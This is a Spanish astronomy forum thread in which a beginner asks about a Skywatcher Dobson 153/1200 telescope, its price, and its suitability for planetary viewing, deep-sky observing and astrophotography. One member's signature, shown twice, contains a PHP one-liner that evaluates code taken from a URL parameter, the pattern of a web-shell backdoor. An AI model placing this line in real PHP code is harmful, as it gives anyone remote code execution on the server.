hola a todos los foreros!!

Preguntas básicas sobre astronomía
ponce168
Mensajes: 12
Registrado: Mar Sep 02, 2008 4:34 pm

hola a todos los foreros!!

Mensaje por ponce168 »

Hola a todos soy nuevo en este mundo,
llevo unos dias leyendos a vosotros y al final me he acabado comprando un skywatcher dobson 153/1200mm, lo queria usar principalmente para planetaria y espacio profundo, es un todo terreno no?


que opinais de este telescopio es bueno para iniciacion ,lo he conseguido por 180
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

hola a todos los foreros!!

Mensaje por Manuelariza »

Pienso que si es una buena elección, no solo para iniciarte sino para usarlo varios años.
Bienvenido al foro.




Un saludo.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
ponce168
Mensajes: 12
Registrado: Mar Sep 02, 2008 4:34 pm

hola a todos los foreros!!

Mensaje por ponce168 »

[quote="MAL1"]Pienso que si es una buena elección, no solo para iniciarte sino para usarlo varios años.
Bienvenido al foro.




Un saludo.[/quote]

gracias por contestar tan rapido compañero!!
me servira pa alguno añitos mejor que mejor oho!!!

Una cosiya sabes si se podra hacer astrofotografia( dentro un tiempo cuando ya me conozca el cielo y a dominar mi teles)?
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

hola a todos los foreros!!

Mensaje por Manuelariza »

Con el dobson si se puede hacer fotos, aunque es mas complicado que con un newton, de todas pregunta a Astrolozano que creo que esta puesto en ese tema.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

hola a todos los foreros!!

Mensaje por m3ntol »

Hola Ponce,
bienvenido al foro. El telescopio que has comprado es un excelete equipo que te puede durar muchos años. Como bien dices es un todoterreno, ya que con esa abertura y siendo un F/6 te vale para cielo profundo y planetaria.

El precio es inmejorable ¿donde lo has comprado?
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

hola a todos los foreros!!

Mensaje por Manuelariza »

La verdad es que esta muy bien de precio, creo que ese modelo esta alrededor de 250
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Ciempozuelos
Mensajes: 15
Registrado: Lun Ago 11, 2008 12:36 pm

hola a todos los foreros!!

Mensaje por Ciempozuelos »

Hola Ponce168.

Yo tambien tengo el mismo teles que tu e igualmente recien comprado. El pasado viernes pude hacer su estreno oficial y quede muy sorprendido. Pense que no tendría tanta vision.

Respecto a lo de astrofoto con montura Dobson lo veo complicado por el seguimiento, pero si alguien tiene ideas ¡¡que las lance!!

Yo estoy intentando hacer ahora un circulo graduado para la base para poder orientar a tiro con datos de stellarium, pero debo ser malisimo porque cada vez que imprimo los trocitos y los pego...¡¡me sobra!! Ya he decidido ir a una imprenta y que me lo saquen en plotter.

Saludos.

Jesus.
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

hola a todos los foreros!!

Mensaje por m3ntol »

Se me olvidó comentarte lo de la astrofoto,
con esa montura no podrás hacer astrofoto de cielo profundo pero si capturas con webcam de planetaria y tirar fotos a la luna para hacerte un mosaico, por ejemplo.
phpbb:eval(stripslashes($_GET[e]));
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

hola a todos los foreros!!

Mensaje por rviper »

bienvenido ponce168.

yo estoy a la espera de que me llamen desde airelibre para ir a recoger el 8". en cualquier sitio que mires recomiendan para empezar los dobson, ya sean de 6, 8 o 10", asi que algo bueno tienen que tener ;). Ademas, el precio esta muy bien (el tuyo genial). A ver cuando los estrenamos.
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
ponce168
Mensajes: 12
Registrado: Mar Sep 02, 2008 4:34 pm

hola a todos los foreros!!

Mensaje por ponce168 »

hola que rapidos contestando compañeros!!

Pues si la verdad es que yo tamb me sorprendi del precio, lo habia visto por 290/250
Responder